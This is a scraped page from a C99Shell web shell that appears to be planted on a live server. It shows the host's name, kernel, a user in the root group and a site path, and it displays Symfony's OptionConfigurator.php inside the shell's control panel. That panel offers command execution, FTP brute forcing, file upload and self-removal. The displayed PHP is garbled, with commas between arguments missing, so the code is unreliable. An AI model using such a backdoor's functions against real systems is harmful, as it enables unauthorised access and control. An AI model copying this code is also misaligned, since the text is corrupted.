!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/symfony/options-resolver/   drwxr-xr-x
Free 29.17 GB of 117.98 GB (24.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OptionConfigurator.php (3.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\OptionsResolver;

use 
Symfony\Component\OptionsResolver\Exception\AccessException;

final class 
OptionConfigurator
{
    public function 
__construct(
        private 
string $name,
        private 
OptionsResolver $resolver,
    ) {
        
$this->resolver->setDefined($name);
    }

    
/**
     * Adds allowed types for this option.
     *
     * @return $this
     *
     * @throws AccessException If called from a lazy option or normalizer
     */
    
public function allowedTypes(string ...$types): static
    {
        
$this->resolver->setAllowedTypes($this->name$types);

        return 
$this;
    }

    
/**
     * Sets allowed values for this option.
     *
     * @param mixed ...$values One or more acceptable values/closures
     *
     * @return $this
     *
     * @throws AccessException If called from a lazy option or normalizer
     */
    
public function allowedValues(mixed ...$values): static
    {
        
$this->resolver->setAllowedValues($this->name$values);

        return 
$this;
    }

    
/**
     * Sets the default value for this option.
     *
     * @return $this
     *
     * @throws AccessException If called from a lazy option or normalizer
     */
    
public function default(mixed $value): static
    {
        
$this->resolver->setDefault($this->name$value);

        return 
$this;
    }

    
/**
     * Defines an option configurator with the given name.
     */
    
public function define(string $option): self
    
{
        return 
$this->resolver->define($option);
    }

    
/**
     * Marks this option as deprecated.
     *
     * @param string          $package The name of the composer package that is triggering the deprecation
     * @param string          $version The version of the package that introduced the deprecation
     * @param string|\Closure $message The deprecation message to use
     *
     * @return $this
     */
    
public function deprecated(string $packagestring $versionstring|\Closure $message 'The option "%name%" is deprecated.'): static
    {
        
$this->resolver->setDeprecated($this->name$package$version$message);

        return 
$this;
    }

    
/**
     * Sets the normalizer for this option.
     *
     * @return $this
     *
     * @throws AccessException If called from a lazy option or normalizer
     */
    
public function normalize(\Closure $normalizer): static
    {
        
$this->resolver->setNormalizer($this->name$normalizer);

        return 
$this;
    }

    
/**
     * Marks this option as required.
     *
     * @return $this
     *
     * @throws AccessException If called from a lazy option or normalizer
     */
    
public function required(): static
    {
        
$this->resolver->setRequired($this->name);

        return 
$this;
    }

    
/**
     * Sets an info message for an option.
     *
     * @return $this
     *
     * @throws AccessException If called from a lazy option or normalizer
     */
    
public function info(string $info): static
    {
        
$this->resolver->setInfo($this->name$info);

        return 
$this;
    }

    
/**
     * Sets whether ignore undefined options.
     *
     * @return $this
     */
    
public function ignoreUndefined(bool $ignore true): static
    {
        
$this->resolver->setIgnoreUndefined($ignore);

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--